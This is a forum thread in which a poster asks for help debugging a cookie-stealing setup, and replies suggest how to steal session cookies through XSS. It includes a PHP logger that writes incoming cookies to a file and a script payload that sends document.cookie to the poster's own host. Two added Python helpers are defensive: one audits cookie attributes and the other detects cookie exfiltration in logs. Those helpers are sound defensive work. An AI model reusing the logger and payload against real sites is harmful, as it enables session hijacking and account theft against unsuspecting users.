Posted

Hey everyone.

I'm trying to set up a community cookie logger.

I've created a cookielogger.php containing

```php
$filename = "logfile.txt";
if (isset($_GET["cookie"]))
{
    if (!$handle = fopen($filename, 'a'))
    {
        echo "Temporary Server Error,Sorry for the inconvenience.";
        exit;
    }
    else
    {
        if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
        {
            echo "Temporary Server Error,Sorry for the inconvenience.";
            exit;
        }
    }
    echo "Temporary Server Error,Sorry for the inconvenience.";
    fclose($handle);
    exit;
}
echo "Temporary Server Error,Sorry for the inconvenience.";
exit;
?>
```

Then, an empty logfile.txt

And a file called meal.gif containing

```html
<script>location.href='http://masque.myhost.net/cookielogger.php?cookie='+escape(document.cookie)</SCRIPT>
```

The files look like the following:

/htdocs/cookielogger.php

/htdocs/logfile.txt

/htdocs/meal.gif

Read and Write permissions on logfile.txt are enabled (7777). But somehow, the file is still empty after a community member has visited.

Could someone help me with that?

Thanks!

Benny

Posted

Unless you can find a cross site scripting flaw in the site you're trying to steal cookies from, or in the user's browser itself, you are not going to be able to download all their cookies by simply having them view your site. The only cookie you would be able to get this way is one set by your own site.

Now, if you could insert some code that ran on someone else's site and wrote the cookies back to your servers, then you might have the chance to steal something, but only if they fall victim to xss vulnerabilities. Iframes won't work either, since the iframe would be cookies from your site, not the target site. Javascript is your best bet, or if you could post back to your php file on your site with a form or javascript link embedded on their site.
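As an added defender-side illustration (not part of this thread): the cookie attribute that keeps a script from reading a cookie through document.cookie is HttpOnly, and this Python helper audits Set-Cookie headers for it, along with Secure and SameSite. The sample headers are constructed.

```python
"""Audit Set-Cookie headers for the attributes that limit theft via script.

A cookie set without HttpOnly is readable from document.cookie, which is
exactly what the injected <script> in the thread relies on.
"""
from typing import Dict, List, Tuple

SAMPLE_HEADERS = [  # constructed examples of Set-Cookie header values
    "PHPSESSID=abc123; Path=/",
    "PHPSESSID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
]


def parse_set_cookie(header: str) -> Tuple[str, Dict[str, str]]:
    """Split a Set-Cookie value into (cookie name, {attribute: value})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, _value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()   # attributes are case-insensitive
    return name.strip(), attrs


def audit_set_cookie(header: str) -> List[str]:
    """Return a list of findings; an empty list means the cookie is hardened."""
    _name, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable via document.cookie")
    if "secure" not in attrs:
        findings.append("missing Secure: sent over plaintext HTTP")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: attached to cross-site requests")
    return findings


if __name__ == "__main__":
    for h in SAMPLE_HEADERS:
        print(h, "->", audit_set_cookie(h) or "ok")
```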

Posted

Other than what Digip pointed out,

You have a typo:

```php
{
if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
{
```

At least I think that there should not be three (3) "=" marks, two (2) should mean equal.

and shouldn't you specify name of the cookie you are trying to get?

Sorry if my post is complete bs.

Posted
> Other than what Digip pointed out,
>
> You have a typo:
>
> At least I think that there should not be three (3) "=" marks, two (2) should mean equal.
>
> and shouldn't you specify name of the cookie you are trying to get?
>
> Sorry if my post is complete bs.

You can get the cookie with javascript simply by typing into your toolbar the following

java script:alert(document.cookie);

Just take out the spaces the forums put in the code. If you were stealing cookies, you can use something similar to construct a URL people can click on and make it post back the cookie to some cgi or php script on your own server. If they were dumb enough, you could make an email url and have them send it to you directly. It's whether or not the target site you want the cookies from is vulnerable to xss though, and if they allow you to post javascript or other code into their pages.
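Added detection example, not from the thread: the post-back request described above leaves a query parameter whose decoded value is a list of cookie name=value pairs, and this Python scan flags such requests in combined-format logs from an egress proxy or web server. The log lines are constructed; the host masque.myhost.net is the one from the original post.

```python
"""Flag log entries whose query string carries cookie-looking data.

Works on Apache/nginx combined log format; a proxy log with the full URL in
the request line is parsed the same way.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Session cookie names worth flagging even when only one pair is present.
SESSION_COOKIE_NAMES = {"phpsessid", "jsessionid", "asp.net_sessionid", "sessionid", "sid"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

SAMPLE_LOG = [  # constructed log lines
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET http://masque.myhost.net/cookielogger.php'
    '?cookie=PHPSESSID%3Dabc123%3B%20user%3Dbenny HTTP/1.1" 200 40 "http://forum.example/" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /search.php?q=a%3Db HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]


def looks_like_cookie_jar(value: str) -> bool:
    """True if a decoded query value reads like one or more cookie name=value pairs."""
    pairs = [p.strip() for p in value.split(";") if p.strip()]
    if not pairs or not all("=" in p for p in pairs):
        return False
    names = {p.split("=", 1)[0].strip().lower() for p in pairs}
    # A known session cookie name, or several pairs joined by ';' as document.cookie emits them.
    return bool(names & SESSION_COOKIE_NAMES) or len(pairs) >= 2


def find_cookie_exfil(log_lines):
    """Return (client_ip, request_target, parameter) for each suspicious request."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qs percent-decodes values, so %3D/%3B become '=' and ';' here.
        for param, values in parse_qs(query, keep_blank_values=True).items():
            if any(looks_like_cookie_jar(v) for v in values):
                hits.append((m.group("ip"), m.group("target"), param))
    return hits


if __name__ == "__main__":
    for hit in find_cookie_exfil(SAMPLE_LOG):
        print("possible cookie exfiltration:", hit)
```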

Posted
> Read and Write permissions on logfile.txt are enabled (7777).

You set a file facing the Internet to 7777 with that code you provided? That's awesome, can I go ahead and get your IP address? Thanks :)

Posted

The file permissions should be 0777 not 7777

And you're not going to really be able to modify the files being presented on the HTTPd,

Unless you find an exploit.

Posted
> The file permissions should be 0777 not 7777
>
> And you're not going to really be able to modify the files being presented on the HTTPd,
>
> Unless you find an exploit.

I hope you weren't responding to me since your post is completely incorrect.

Posted

Yes I was responding to you,

Please explain?

Posted
> The file permissions should be 0777 not 7777
>
> And you're not going to really be able to modify the files being presented on the HTTPd,
>
> Unless you find an exploit.

Well, there's a lot wrong here. Without going into too many details or wanting to argue, let's just take your statements and debunk them.

Given the code:

> I've created a cookielogger.php containing
>
> ```php
> $filename = "logfile.txt";
> if (isset($_GET["cookie"]))
> {
>     if (!$handle = fopen($filename, 'a'))
>     {
>         ...
>     }
>     else
>     {
>         if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
>         {
>             ...
>         }
>     }
>     ...
> ?>
> ```

You simply give him a page with a correct cookie value and it's written to the file. That file is served by httpd. So "And you're not going to really be able to modify the files being presented on the HTTPd" is an incorrect statement.

Let's look at your first statement about the file permissions. Why do you need the setuid, sticky, setgid, and execute permissions set? It's a security risk. So that statement is wrong as well.

Yes, I think I see what you meant to say about the exploitation. But you didn't, and your statements are therefore incorrect like I said.

The details about how I would gain entry to such a system are beyond the scope of this argument. If you ask me really nicely I might try to help you out if you set up such a box for me to gain entry to. Really though, if you can't see any problems with the presented vulnerabilities then you should pick up a book on security.

Start simple, go with the Hacking Exposed books.
